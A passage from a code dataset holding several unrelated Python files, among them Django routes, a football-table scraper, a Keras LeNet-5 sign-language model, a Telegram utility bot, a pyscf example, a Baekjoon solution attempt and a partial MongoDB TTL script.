])),\n]","sub_path":"WebApplication/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367997300","text":"import os\nfrom shutil import copy\n\n\ndef fibonacci(n):\n    # 0th and 1st term\n    nums = [0, 1]\n    # Start from the 2nd term to the nth term\n    for i in range(2, n + 1):\n        nums.append(nums[i - 2] + nums[i - 1])\n    print(nums)\n\n\ndef fizzbuzz(n):\n    # Store our values\n    nums = []\n    for i in range(1, n + 1):\n        val = str(i)\n        if i % 3 == 0 and i % 5 == 0:\n            val = 'fizzBuzz'\n        elif i % 3 == 0:\n            val = 'fizz'\n        elif i % 5 == 0:\n            val = 'buzz'\n        nums.append(val)\n    print(nums)\n\n\ndef saveFile(path):\n    # The location of our data directory. Will be something like C:\\Users\\drale\\Documents\\example_directory\\example_package\\data\n    saveLoc = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\n    # Get the file name of the passed path.\n    _, fileName = os.path.split(path)\n\n    # Get the new save location. 
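(the data directory plus the original file name -- added note)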
Will be something like C:\\Users\\drale\\Documents\\example_directory\\example_package\\data\\example.csv\n print(path)\n print(saveLoc)\n # Copy the file over\n copy(path, saveLoc)\n print('Saved!')\n\n\ndef printFiles():\n # The location of our data directory. Will be something like C:\\Users\\drale\\Documents\\example_directory\\example_package\\data\n saveLoc = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\n print(saveLoc)\n for file in os.listdir(saveLoc):\n # print each file\n print(file)\n","sub_path":"uploading-projects-to-pip/example_directory/build/lib/example_package/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"647383654","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nfrom time import sleep\n\nano_counter = 0\n\nfor ano in range(7):\n\n anoTabela = str(ano_counter+2012) + \"/serie-a/\"\n link = \"https://www.tabeladobrasileirao.net/\" + str(anoTabela)\n\n print(link)\n\n try:\n req = requests.get(link)\n except:\n if req.status_code != 200:\n print('Requisição falhou!!!')\n content = req.content\n else:\n\n if req.status_code == 200:\n print('Requisição ok!!!')\n content = req.content\n\n soup = BeautifulSoup(content, 'html.parser')\n table = soup.findAll('div')\n\n table_str = str(table)\n jogos = pd.read_html(table_str)[0]\n classificacao = pd.read_html(table_str)[1]\n\n anoStr = ano_counter + 2012\n classificacaoSave = \"tabela\" + str(anoStr) + \".csv\"\n jogosSave = \"jogos\" + str(anoStr) + \".csv\"\n\n classificacao.to_csv(classificacaoSave)\n jogos.to_csv(jogosSave)\n\n ano_counter += 1\n\n print( \"processso \" + str(anoStr) + \" ok!!!\")\n\n sleep(5)\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"286429369","text":"\"\"\"\r\nThis code use LeNet-5 Structure to train Sign Language models\r\n@author: Bowen Song\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Conv2D , MaxPool2D , Flatten , Dropout , BatchNormalization\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import classification_report,confusion_matrix\r\nfrom keras.callbacks import ReduceLROnPlateau\r\n\r\n# Input data files from directory\r\nimport os\r\nfor dirname, _, filenames in os.walk('C:/Users/Administrator/Downloads/Data'):\r\n for filename in filenames:\r\n print(os.path.join(dirname, filename))\r\n\r\n# Loading the ASL dataset \r\ntrain_df = pd.read_csv(\"C:/Users/Administrator/Downloads/Data/sign_mnist_train/sign_mnist_train.csv\")\r\ntest_df = pd.read_csv(\"C:/Users/Administrator/Downloads/Data/sign_mnist_test/sign_mnist_test.csv\")\r\n\r\n# get training labels\r\n# remove label column from data and get the remaining data\r\ny_train = train_df['label']\r\ny_test = test_df['label']\r\ndel train_df['label']\r\ndel test_df['label']\r\nx_train = train_df.values\r\nx_test = test_df.values\r\n\r\n# Labels to OneHot\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nlabel_binarizer = LabelBinarizer()\r\ny_train = label_binarizer.fit_transform(y_train)\r\ny_test = label_binarizer.fit_transform(y_test)\r\n\r\n# Normalize the data\r\nx_train = 
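The scraper's try/except above references `req` even when `requests.get` itself raised, which would crash with a NameError instead of handling the failure. A safer fetch helper, as a sketch:

```python
import requests

def fetch(url, timeout=10):
    try:
        resp = requests.get(url, timeout=timeout)
        resp.raise_for_status()    # treat non-2xx statuses as errors too
        return resp.content
    except requests.RequestException as exc:
        print('Requisição falhou: %s' % exc)
        return None
```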
x_train / 255\r\nx_test = x_test / 255\r\n\r\n# Reshaping the data to feed into CNN\r\nx_train = x_train.reshape(-1,28,28,1)\r\nx_test = x_test.reshape(-1,28,28,1)\r\n\r\n# data augmentation\r\ndatagen = ImageDataGenerator(\r\n featurewise_center=False, # set input mean to 0 over the dataset\r\n samplewise_center=False, # set each sample mean to 0\r\n featurewise_std_normalization=False, # divide inputs by std of the dataset\r\n samplewise_std_normalization=False, # divide each input by its std\r\n zca_whitening=False, # apply ZCA whitening\r\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\r\n zoom_range = 0.1, # Randomly zoom image \r\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\r\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\r\n horizontal_flip=False, # randomly flip images\r\n vertical_flip=False) # randomly flip images\r\n\r\ndatagen.fit(x_train)\r\n\r\n# LeNet-5 Model\r\nmodel = Sequential()\r\nmodel.add(Conv2D(6 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu' , input_shape = (28,28,1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\r\nmodel.add(Conv2D(16 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\r\nmodel.add(Conv2D(120 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(units = 512 , activation = 'relu'))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(units = 24 , activation = 'softmax'))\r\nmodel.compile(optimizer = 'adam' , loss = 'categorical_crossentropy' , metrics = ['accuracy'])\r\nmodel.summary()\r\n\r\n# checkpoint\r\nfilepath=\"LeNet-5-weights-improvement-{epoch:02d}-{val_loss:.2f}.hdf5\"\r\ncheckpoint = keras.callbacks.ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True,\r\n mode='min')\r\ncallbacks_list = [checkpoint]\r\nhistory = model.fit(datagen.flow(x_train,y_train, batch_size = 128) ,epochs = 50 , \\\r\n validation_data = (x_test, y_test) , callbacks=callbacks_list)\r\n\r\n# list all data in history\r\nprint(history.history.keys())\r\n# summarize history for accuracy\r\nplt.plot(history.history['accuracy'])\r\nplt.plot(history.history['val_accuracy'])\r\nplt.title('model accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()\r\n# summarize history for loss\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()\r\n\r\ntest_loss, test_accuracy = model.evaluate(x_test, y_test)\r\n\r\nprint('Test accuracy: {:2.2f}%'.format(test_accuracy*100))\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"code/model/LeNet5_Model.py","file_name":"LeNet5_Model.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"197775892","text":"import matplotlib.pyplot as plt\nfrom cycler import cycler\nimport matplotlib as mpl\n\n\ndef cm2inch(*tupl):\n inch = 2.54\n if isinstance(tupl[0], tuple):\n return tuple(i / inch for i in tupl[0])\n else:\n return tuple(i / inch for i in 
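One caveat in the LeNet-5 pipeline above: calling `fit_transform` on the test labels re-fits the binarizer, which silently mislabels columns if a class is absent from the test set. The fit-once pattern, as a toy sketch:

```python
from sklearn.preprocessing import LabelBinarizer

lb = LabelBinarizer()
y_train = lb.fit_transform([0, 1, 2, 2])   # learn the class set on train only
y_test = lb.transform([2, 0])              # reuse the same mapping on test
```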
tupl)\n\n\ndef style_cmyk():\n # https://matplotlib.org/tutorials/introductory/customizing.html\n plt.rcParams[\"font.family\"] = \"Arial\"\n # plt.rcParams['mathtext.default'] = 'regular'\n plt.rcParams['font.size'] = 8\n plt.rcParams['axes.autolimit_mode'] = 'data' # 'round_numbers' to eliminate axis margin\n plt.rcParams['axes.spines.top'] = False\n plt.rcParams['axes.spines.right'] = False\n plt.rcParams['legend.frameon'] = False\n plt.rcParams['figure.frameon'] = False\n plt.rcParams['figure.figsize'] = 18 / 2.54, 12 / 2.54\n mpl.rcParams['axes.prop_cycle'] = cycler(color=['#00A8E8', '#E62A88', '#FFBC1F', 'k', '#AD343E'])\n\n\ndef style_savefig():\n plt.rcParams['savefig.format'] = 'svg' # also eps for vector\n # plt.rcParams['savefig.dpi'] = 300\n\n\ndef example_plot():\n style_cmyk()\n\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n\n # ax1.set_title(\"This is my title\")\n ax1.set_xlabel('X-axis')\n ax1.set_ylabel('Y-axis')\n ax1.plot([0, 1], [0, 1], label='test1')\n ax1.plot([1, 2], [3, 4], label='test1')\n ax1.plot([0, 1], [1, 3], label='test1')\n ax1.plot([1, 2], [1, 4], label='test1')\n txt = 'Figure 1. I need the caption to be present a little below X-axis'\n plt.figtext(0.5, 0.03, txt, wrap=True, horizontalalignment='center', fontsize=10)\n plt.subplots_adjust(top=0.95, bottom=0.15)\n ax1.legend()\n plt.show()\n\n\ndef example_subplots():\n fig = plt.figure()\n for i, label in enumerate(('A', 'B', 'C', 'D')):\n ax = fig.add_subplot(2, 2, i + 1)\n ax.text(0.05, 0.95, label, transform=ax.transAxes,\n fontsize=16, fontweight='bold', va='top')\n plt.show()\n","sub_path":"plot_style.py","file_name":"plot_style.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"435168779","text":"from django.conf.urls import url\n\nfrom . 
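A usage sketch for the plot-style helpers above: apply `style_cmyk` and size a figure in centimetres via `cm2inch`:

```python
import matplotlib.pyplot as plt

style_cmyk()                                     # apply the rc settings above
fig, ax = plt.subplots(figsize=cm2inch(18, 12))  # an 18 cm x 12 cm canvas
ax.plot([0, 1], [0, 1])
plt.show()
```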
import views\n\nurlpatterns = [\n url(r'^$', views.feed, name='feed'),\n url(r'^profile/(?P\\d+)', views.profile, name='profile'),\n url(r'^create_post', views.post, name='create_post'),\n url(r'^delete/(?P\\d+)', views.delete, name='delete'),\n url(r'^api$', views.api, name='api'),\n url(r'^api/posts/$', views.PostList.as_view()),\n url(r'^api/profiles/$', views.ProfileList.as_view()),\n url(r'^api/posts/(?P\\d+)/$', views.IndividualPost.as_view()),\n]\n","sub_path":"Feed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"48156081","text":"import logging\n\nfrom telegram import Update, KeyboardButton, ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import MessageHandler, Filters, CommandHandler, CallbackContext\nfrom telegram.files.inputmedia import InputMediaPhoto\n\nfrom app import dice\nfrom app.ext_apis.dxy_open_data import load_ncov_data\nfrom app.ext_apis import csse_covid_19_data\nfrom app.ext_apis.tw_open_data import epa_aqi_api, uv_api\nfrom app.ext_apis.util import cartesian\nfrom app.ext_apis.util import reverse_geocode_customize\nfrom app.sqlite_utils.user_location import check_or_create_table_tg_user_location, insert_tg_user_location\nfrom app.sqlite_utils.user_location import query_tg_user_location\n\n\ndef get_function_keyboard_markup(chat_type):\n weather_button = KeyboardButton(text='\\U00002603 天氣')\n tarot_button = KeyboardButton(text='\\U0001F0CF 塔羅')\n fortune_button = KeyboardButton(text='\\U0001F3B0 運勢')\n ncov_button = KeyboardButton(text='\\U0001F637 武漢肺炎')\n ncov_new_button = KeyboardButton(text='\\U0001F637 武漢肺炎(CSSE)')\n touch_schumi_button = KeyboardButton(text='\\U0001F430 摸朽咪')\n feedback_button = KeyboardButton(text='\\U0001F4E8 建議交流')\n # “private”, “group”, “supergroup” or “channel”\n if chat_type != 'private':\n set_location_button = KeyboardButton(text='\\U0001F4CD 設定位置')\n else:\n set_location_button = KeyboardButton(text='\\U0001F4CD 設定位置', request_location=True)\n close_button = KeyboardButton(text='\\U0000274E 關閉鍵盤')\n custom_keyboard = [\n [weather_button, tarot_button, fortune_button],\n [ncov_button, ncov_new_button, touch_schumi_button],\n [feedback_button, set_location_button, close_button]\n ]\n markup = ReplyKeyboardMarkup(\n custom_keyboard,\n resize_keyboard=True,\n one_time_keyboard=True,\n selective=True,\n )\n return markup\n\n\ndef bot_help(update: Update, _context: CallbackContext):\n # _args = context.args\n update.message.reply_text(\n text=f'你可以:\\n'\n f'輸入 \"/\" 展開指令選單\\n'\n f'使用貼圖旁邊的 [ / ] 按鈕展開指令選單\\n'\n f'使用下面的鍵盤選單',\n reply_markup=get_function_keyboard_markup(update.message.chat.type)\n )\n\n\ndef get_ncov_keyboard_markup():\n korea_button = KeyboardButton(text='\\U0001F1F0\\U0001F1F7 韓國')\n japan_button = KeyboardButton(text='\\U0001F1EF\\U0001F1F5 日本')\n italy_button = KeyboardButton(text='\\U0001F1EE\\U0001F1F9 義大利')\n iran_button = KeyboardButton(text='\\U0001F1EE\\U0001F1F7 伊朗')\n reject_button = KeyboardButton(text='\\U0000274E 關閉鍵盤')\n custom_keyboard = [\n [korea_button, japan_button, italy_button, iran_button],\n [reject_button]\n ]\n markup = ReplyKeyboardMarkup(\n custom_keyboard,\n resize_keyboard=True,\n one_time_keyboard=True,\n selective=True,\n )\n return markup\n\n\ndef get_location_keyboard_markup():\n location_button = KeyboardButton(text='我要提供位置資訊', request_location=True)\n reject_button = KeyboardButton(text='\\U0000274E 關閉鍵盤')\n custom_keyboard = [[location_button, 
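The `(?P\d+)` patterns in the Feed urls above look like extraction damage: Django requires a named group such as `(?P<pk>\d+)` to pass the capture to the view. A sketch of the conventional form, where `pk` is an illustrative name (the original group names were lost):

```python
from django.conf.urls import url
from . import views

urlpatterns = [
    # 'pk' is a hypothetical group name; the originals were stripped
    url(r'^profile/(?P<pk>\d+)', views.profile, name='profile'),
    url(r'^delete/(?P<pk>\d+)', views.delete, name='delete'),
    url(r'^api/posts/(?P<pk>\d+)/$', views.IndividualPost.as_view()),
]
```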
reject_button]]\n markup = ReplyKeyboardMarkup(\n custom_keyboard,\n resize_keyboard=True,\n one_time_keyboard=True,\n selective=True,\n )\n return markup\n\n\ndef get_weather_data_from_closest_site(lat, lon, json_data, site_tree):\n \"\"\"\n use K-D tree to find closet place\n ref: https://www.timvink.nl/closest-coordinates/\n :param lat:\n :param lon:\n :param json_data:\n :param site_tree:\n :return:\n \"\"\"\n cartesian_coord = cartesian(lat, lon)\n closest_site = site_tree.query([cartesian_coord], p=2)\n site_index = closest_site[1][0]\n return json_data[site_index]\n\n\ndef weather(update: Update, _context: CallbackContext):\n # _args = context.args\n gps_location = query_tg_user_location(update.effective_user.id)\n if not gps_location:\n if update.message.chat.type == 'private':\n reply = '朽咪不知道您的位置資訊,你想提供位置資訊讓朽咪提供更多服務嗎?'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply,\n reply_markup=get_location_keyboard_markup()\n )\n else:\n reply = '朽咪不知道您的位置資訊,請點擊 @oripyon_bot 打開對話以提供位置'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply\n )\n else:\n lat, lon = gps_location\n update.message.reply_text(text='自動取用離你最近的測站天氣資料中,目前僅限台灣國內才能正常使用', disable_notification=True)\n # update.message.reply_text(text='取得環保署即時空品資料中...', disable_notification=True)\n aqi_json_data, aqi_site_tree = epa_aqi_api()\n aqi_info = get_weather_data_from_closest_site(lat, lon, aqi_json_data, aqi_site_tree)\n aqi_site_name = aqi_info['SiteName']\n aqi_site_county = aqi_info['County']\n aqi = aqi_info['AQI']\n aqi_status = aqi_info['Status']\n pm25 = aqi_info['PM2.5']\n aqi_publish_time = aqi_info['PublishTime']\n # update.message.reply_text(text='取得環保署即時紫外線資料中...', disable_notification=True)\n uv_json_data, uv_site_tree = uv_api()\n uv_info = get_weather_data_from_closest_site(lat, lon, uv_json_data, uv_site_tree)\n uv_site_name = uv_info['SiteName']\n uv_site_county = uv_info['County']\n uvi = uv_info['UVI']\n uv_publish_time = uv_info['PublishTime']\n geo_info = reverse_geocode_customize((lat, lon))[0]\n update.message.reply_text(\n f'\\U0001F310 你所在的位置:{geo_info[\"name\"]} (行政區: {geo_info[\"admin1\"]}, 國家: {geo_info[\"cc\"]})\\n'\n f'離你最近的測站資訊:\\n'\n f'\\n'\n f'\\U0001F4A8 空品資訊從{aqi_site_name}測站 ({aqi_site_county})\\n'\n f'\\U000027A1 {aqi_status} (AQI: {aqi}, PM2.5: {pm25})\\n'\n f'\\U0000231A 時間: {aqi_publish_time}\\n'\n f'\\n'\n f'\\U0001F506 紫外線資訊從{uv_site_name}測站 ({uv_site_county})\\n'\n f'\\U000027A1 UVI: {uvi} \\n'\n f'\\U0000231A 時間: {uv_publish_time}\\n'\n )\n\n\ndef tarot(update: Update, _context: CallbackContext):\n # _args = context.args\n card = dice.draw_tarot()\n logging.getLogger(__name__).info(f'reply: {card}')\n update.message.reply_photo(\n photo=card['url'],\n caption=card['nameCN'],\n disable_notification=True,\n reply_to_message_id=update.message.message_id,\n )\n\n\ndef fortune(update: Update, _context: CallbackContext):\n # _args = context.args\n reply = dice.fortune(None, None)\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef dummy_reply(update: Update, _context: CallbackContext):\n reply = '什麼事都沒發生,就跟你說別按齁 \\U0001F430'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef ncov_reply(update: Update, _context: CallbackContext):\n reply = '請選擇要查詢的災區國家 \\U0001F430'\n update.message.reply_text(\n text=reply,\n reply_markup=get_ncov_keyboard_markup()\n )\n\n\ndef query_ncov(update: Update, _context: CallbackContext, 
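The closest-station lookup above in a self-contained form: project lat/lon to 3-D Cartesian coordinates so Euclidean distance preserves great-circle ordering, then query a k-d tree. This `cartesian` is a plausible stand-in for the imported util helper, which may differ:

```python
from math import radians, cos, sin
from scipy.spatial import cKDTree

def cartesian(lat, lon, R=6371.0):
    # spherical coordinates (degrees) to 3-D Cartesian on an Earth-radius sphere
    lat, lon = radians(lat), radians(lon)
    return (R * cos(lat) * cos(lon), R * cos(lat) * sin(lon), R * sin(lat))

sites = [(25.04, 121.51), (24.14, 120.68), (22.63, 120.30)]  # toy station list
tree = cKDTree([cartesian(lat, lon) for lat, lon in sites])
_, idx = tree.query([cartesian(25.0, 121.5)], p=2)
print(sites[idx[0]])   # nearest station to the query point
```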
country):\n country_image_url = load_ncov_data()\n media_group = []\n for key in country_image_url:\n if key.startswith(country):\n media_group.append(InputMediaPhoto(media=country_image_url[key], caption=key))\n update.message.reply_media_group(\n media=media_group,\n disable_notification=True,\n )\n\n\ndef query_ncov_csse(update: Update, _context: CallbackContext, country):\n country_state_result, country_result = csse_covid_19_data.load_ncov_data()\n if country not in country_result:\n reply = '查無此國家'\n else:\n reply = [data[0].strftime('%Y-%m-%d') + ': ' + str(data[1]) + ', ' for data in country_result[country]]\n update.message.reply_test(\n text=reply,\n disable_notification=True,\n )\n\n\ndef touch_schumi(update: Update, _context: CallbackContext):\n reply = dice.touch_schumi()\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef feedback(update: Update, _context: CallbackContext):\n reply = f'聯絡作者 @leafwind_tw\\n' \\\n f'朽咪公開聊天區 @oripyon_talk'\n update.message.reply_text(reply)\n\n\n# from Code snippets\n# https://github.com/python-telegram-bot/python-telegram-bot/wiki/Code-snippets#requesting-location-and-contact-from-user\ndef set_location(update: Update, _context: CallbackContext):\n if update.message.chat.type == 'private':\n reply = '你想提供位置資訊讓朽咪提供更多服務嗎?'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply,\n reply_markup=get_location_keyboard_markup()\n )\n else:\n reply = '抱歉,位置只支援私訊朽咪 @oripyon_bot 提供'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(\n text=reply\n )\n\n\ndef close_keyboard(update: Update, _context: CallbackContext):\n reply = 'OK!\\U0001F430'\n logging.getLogger(__name__).info(f'reply: {reply}')\n update.message.reply_text(reply, reply_markup=ReplyKeyboardRemove())\n\n\ndef make_reply(update: Update, _context: CallbackContext):\n # _args = context.args\n if not update.message.text:\n logging.warning(f'no text attribute in: {update.message}')\n text = update.message.text\n logger = logging.getLogger(__name__)\n if text == '\\U00002603 天氣':\n weather(update, _context)\n elif text == '\\U0001F0CF 塔羅':\n tarot(update, _context)\n elif text == '\\U0001F3B0 運勢':\n fortune(update, _context)\n elif text == '\\U0001F637 武漢肺炎':\n ncov_reply(update, _context)\n elif text == '\\U0001F637 武漢肺炎(CSSE)':\n query_ncov_csse()\n elif text == '\\U0001F430 摸朽咪':\n touch_schumi(update, _context)\n elif text == '\\U0001F4E8 建議交流':\n feedback(update, _context)\n elif text == '\\U0001F4CD 設定位置':\n set_location(update, _context)\n elif text == '\\U0000274E 關閉鍵盤':\n close_keyboard(update, _context)\n elif text == '\\U0001F1F0\\U0001F1F7 韓國':\n query_ncov(update, _context, 'korea')\n elif text == '\\U0001F1EF\\U0001F1F5 日本':\n query_ncov(update, _context, 'japan')\n elif text == '\\U0001F1EE\\U0001F1F9 義大利':\n query_ncov(update, _context, 'italy')\n elif text == '\\U0001F1EE\\U0001F1F7 伊朗':\n query_ncov(update, _context, 'iran')\n elif 'ㄆㄆ' in text:\n reply = '我知道!戳!\\U0001F430'\n logger.info(f'reply: {reply}')\n update.message.reply_text(reply)\n elif '我看了' in text:\n update.message.reply_sticker(\n sticker='CAACAgUAAxkBAAMrXlNbUucnbiBebclIoM_qSMb52-sAAjoBAALvY54jySoLvI3DgmEYBA',\n disable_notification=True,\n reply_to_message_id=update.message.message_id,\n )\n elif '沒事了' in text:\n reply = '沒事就好\\U0001F430'\n logger.info(f'reply: {reply}')\n update.message.reply_text(reply)\n\n\ndef receive_location(update: Update, _context: CallbackContext):\n location = 
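`query_ncov_csse` above has two visible slips: `reply_test` for `reply_text`, and `make_reply` later invokes it with no arguments. A hedged corrected sketch, assuming `country_result[country]` holds (date, count) pairs as the `strftime` line implies:

```python
def query_ncov_csse(update, _context, country):
    _, country_result = csse_covid_19_data.load_ncov_data()
    if country not in country_result:
        update.message.reply_text('查無此國家')
        return
    lines = ['%s: %d' % (d.strftime('%Y-%m-%d'), n)
             for d, n in country_result[country]]
    update.message.reply_text(text='\n'.join(lines),
                              disable_notification=True)
```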
update.message.location\n lat = location.latitude\n lon = location.longitude\n user = update.effective_user\n update.message.reply_text(\n f'您的資訊將會被朽咪記住,天氣預測功能將根據以下這些資訊提供服務:\\n'\n f'\\U0001F194 {user.id}\\n'\n f'\\U00003294 first name: {user.first_name}\\n'\n f'\\U0001F464 username: {user.username}\\n'\n f'\\U0001F310 經緯度: {lat}, {lon}'\n )\n check_or_create_table_tg_user_location()\n insert_tg_user_location(user.id, user.first_name, user.username, lat, lon)\n\n\ndef receive_sticker(update: Update, _context: CallbackContext):\n logger = logging.getLogger(__name__)\n logger.info(f'sticker file_id: {update.message.sticker.file_id}')\n\n\ndef add_handlers(dispatcher):\n dispatcher.add_handler(CommandHandler(\"help\", bot_help, pass_args=True))\n dispatcher.add_handler(CommandHandler(\"weather\", weather, pass_args=True))\n # dispatcher.add_handler(CommandHandler(\"tarot\", tarot, pass_args=True))\n # dispatcher.add_handler(CommandHandler(\"fortune\", fortune, pass_args=True))\n dispatcher.add_handler(CommandHandler(\"setlocation\", set_location, pass_args=True))\n dispatcher.add_handler(MessageHandler(Filters.text, make_reply))\n dispatcher.add_handler(MessageHandler(Filters.location, receive_location))\n dispatcher.add_handler(MessageHandler(Filters.sticker, receive_sticker))\n","sub_path":"bot_handler/tg.py","file_name":"tg.py","file_ext":"py","file_size_in_byte":13087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"39438809","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\n'''\nThe object returned by mf.nuc_grad_method() can be used to compute analytical\nnuclear gradients.\n'''\n\nfrom pyscf import gto, scf\n\nmol = gto.M(\n atom = [\n ['O' , 0. , 0. , 0],\n ['H' , 0. , -0.757 , 0.587],\n ['H' , 0. 
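`make_reply`'s long elif chain could be table-driven; a sketch reusing a few of the handler functions defined above:

```python
COMMANDS = {
    '\U00002603 天氣': weather,
    '\U0001F0CF 塔羅': tarot,
    '\U0001F3B0 運勢': fortune,
    '\U0001F430 摸朽咪': touch_schumi,
    '\U0000274E 關閉鍵盤': close_keyboard,
}

def make_reply(update, context):
    handler = COMMANDS.get(update.message.text)  # None when text is unmapped
    if handler:
        handler(update, context)
```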
, 0.757 , 0.587]],\n basis = '631g')\n\nmf = scf.RHF(mol)\nmf.kernel()\ngrad = mf.nuc_grad_method()\ngrad.kernel()\n\nmf = scf.UHF(mol).x2c()\nmf.kernel()\ngrad = mf.nuc_grad_method()\ngrad.kernel()\n","sub_path":"examples/grad/01-scf_grad.py","file_name":"01-scf_grad.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172388013","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 가로수 \n# https://www.acmicpc.net/problem/2485\n\n# 가능한 모든 가로수의 경우의 수를 확인하여 비교 \n\nimport sys\n\nif __name__ == '__main__':\n num = int(sys.stdin.readline().strip())\n inputData = []\n for cnt in range(num):\n inputData.append(int(sys.stdin.readline().strip()))\n\n #print(inputData)\n #inputData = sorted(inputData)\n max = max(inputData)\n min = min(inputData)\n size = max - min + 1\n\n inputData_init = [x-min for x in inputData]\n #print(inputData_init)\n\n check_init = [0]*(size)\n #print(check_init)\n for data in inputData_init:\n check_init[data] = 1\n\n #print(check_init)\n\n #1\n result = {}\n for k in range(1, size):\n compare_arr = [0]*(size)\n compare_arr[0] = 1\n for cnt in range(1, size):\n if cnt % k == 0:\n compare_arr[cnt] = 1\n check = []\n for p in range(size):\n if check_init[p] == 1 and compare_arr[p] == 1:\n check.append(p)\n if check == inputData_init:\n result[k] = compare_arr.count(1) - num\n #print(result)\n\n a = sorted(result, key=lambda x:result[x])\n print(result[a[0]])\n\n\n\n\n\n","sub_path":"BaekjoonOnlineJudge/acmicpc_2485_Fail.py","file_name":"acmicpc_2485_Fail.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"571134507","text":"import multiprocessing\nimport gevent\nimport gevent.monkey\nfrom gevent.pool import Pool\nfrom copy_state_db import CopyStateDB\nfrom faster_ordered_dict import FasterOrderedDict\nfrom pymongo import ReadPreference\nimport utils\nimport logging\nimport datetime\nimport time\nimport os\nimport sys\n\nlog = utils.get_logger(__name__)\n\n\nclass Stats(object):\n def __init__(self):\n self.start_time = self.adj_start_time = time.time()\n self.inserted = 0\n self.batch = 0\n self.total_docs = None\n self.duplicates = 0 # not a true count of duplicates; just an exception count\n self.exceptions = 0\n self.retries = 0\n\n def log(self, adjusted=False):\n start_time = self.adj_start_time if adjusted else self.start_time\n total = self.total_docs\n if total == 0:\n total = 1\n qps = int(float(self.inserted) / (time.time() - start_time))\n pct = int(float(self.inserted)/total*100.0)\n text = (\"%d%% | %d / %d adjusted | %d/sec | %d dupes | %d exceptions | %d retries\" %\n (pct, self.inserted, self.total_docs, qps, self.duplicates,\n self.exceptions, self.retries))\n\n log.debug(text)\n sys.stdout.write(\"\\r\"+text)\n sys.stdout.flush()\n\n\ndef _ttl_stats_worker(stats):\n while True:\n stats.log()\n gevent.sleep(0.1)\n\n\ndef adjust_ttl_batch_worker(source_collection, seconds, ids, stats):\n\n\n stats.batch += len(ids)\n cursor = source_collection.find({'_id': {'$in': ids}})\n cursor.batch_size(len(ids))\n for doc in cursor:\n time = doc['e']\n id = doc['_id']\n newtime = time+datetime.timedelta(seconds=seconds)\n claim = doc['c']\n claim['e'] += seconds\n doc['e'] = newtime\n source_collection.update({'_id': id}, {\"$set\": {'e': newtime, 'c': claim}}, upsert=False)\n stats.inserted += 1\n\n\ndef update_ttls(source, state_path, seconds):\n\n 
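The Baekjoon 2485 snippet above brute-forces every candidate spacing `k`, which is why it is marked "Fail". The standard solution takes the gcd of the consecutive gaps; a sketch:

```python
from math import gcd
from functools import reduce

def missing_trees(positions):
    positions = sorted(positions)
    gaps = [b - a for a, b in zip(positions, positions[1:])]
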